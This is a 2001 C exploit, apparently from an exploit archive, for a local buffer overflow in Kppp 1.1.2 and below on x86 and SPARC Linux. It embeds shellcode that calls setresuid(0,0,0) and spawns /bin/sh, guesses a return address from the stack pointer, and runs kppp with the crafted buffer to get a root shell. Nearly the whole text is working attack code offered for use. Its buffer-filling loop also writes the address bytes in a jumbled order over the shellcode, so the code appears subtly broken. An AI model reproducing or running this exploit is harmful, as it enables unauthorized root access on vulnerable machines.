Kppp (/usr/local/kde/bin/kppp) v1.1.2 and below local exploit. Tested against x86 and Sparc Linux.
6955c7c52f2070a0081b8194b5b560371868aee5f2f1508b33fcd2c8d10a32f7
/*
* exploit.c Linux/Intel Kppp 1.1.2 and below
* Re-Copyright (C) 2001 Doom <doom@sekurity.net>
* <smashstack@hushmail.com)
*
* Null Byte Security <http://nbs.extremenetworking.net>
* Bugtraq ID :
* Credit : TDP, Michel Kaempf, RaiSe
* Tested : x86 Redhat 6.2
* Notes : This may need a little tweaking, hehe ;)
*
* Description: There exists a buffer overflow in Kppp
* probably because of a strcpy call. Also, I feel it's
* safe to release this exploit now, but some distros
* are still including including 1.1.2 in their source.
*
* Greets: Bi0cide, Natas, BrainStorm, Xchgleip, Z,
* Fuqrag, Piffy, Bios Disk, B0ob, Qitest1, Mixter,
* Ghost Blood, K2, Ontogenesis, Char, Mud, Medium,
* Hackers Lab, Electronic Souls, Packet Storm, Security
* Focus, #!ElectronicSouls, sekurity.net, and everyone else.
*/
#include <stdio.h>
#include <stdlib.h>
#define BUFFER 247
#define OFFSET 1
#if defined(__i386__) && defined(__linux__)
char shellcode[] =
"\x29\xc0\x29\xdb\x29\xc9\x29\xd2\xb0\xa4\xcd\x80"
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
"\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
/*
* small setresuid 0,0,0 execve() of /bin/sh (without exit())
*__asm__("
* subl %ebx, %ebx
* subl %ecx, %ecx
* subl %edx, %edx
* movb $0xa4, %al
* int $0x80
* xorl %edx,%edx
* pushl %edx
* pushl $0x68732f6e
* pushl $0x69622f2f
* movl %esp,%ebx
* pushl %edx
* pushl %ebx
* movl %esp,%ecx
* leal 0xb(%edx),%eax
* int $0x80
* ");
*/
#elif defined(__sparc__) && defined(__linux__)
char shellcode[] =
"\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10"
"\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x10";
unsigned long get_sp(void)
{
__asm__("or %sp, %sp, %i0");
}
#endif
int main(int argc, char *argv[])
{
char *buff, *ptr;
long *addr_ptr, addr;
int offset=OFFSET, bsize=BUFFER;
int i;
if (!(buff = malloc(bsize)))
{
printf("Can't allocate memory.\n");
exit(0);
}
printf("\nLocal Linux Kppp Exploit by Doom\n");
printf("Use:$ ./kppp <buffersize> <offset>\n");
addr = get_sp() - offset;
printf("\nReturn Address : 0x%x", addr);
if(argc > 1) bsize = atoi(argv[1]);
if(argc > 2) offset = atoi(argv[2]);
printf("\nBuffer Size : %d\n", bsize);
printf("Offset : %d\n", offset);
ptr = buff;
addr_ptr = (long *) ptr;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
for (i = 0; i < bsize; i += 4 )
{
buff[i ] = ( addr & 0x00ff0000 ) >> 16;
buff[i+1] = ( addr & 0xff000000 ) >> 24;
buff[i+2] = addr & 0x000000ff;
buff[i+3] = ( addr & 0x0000ff00 ) >> 8;
}
buff[bsize - 1] = '\0';
execle("/usr/local/kde/bin/kppp", "kppp", "-c", buff, 0);
}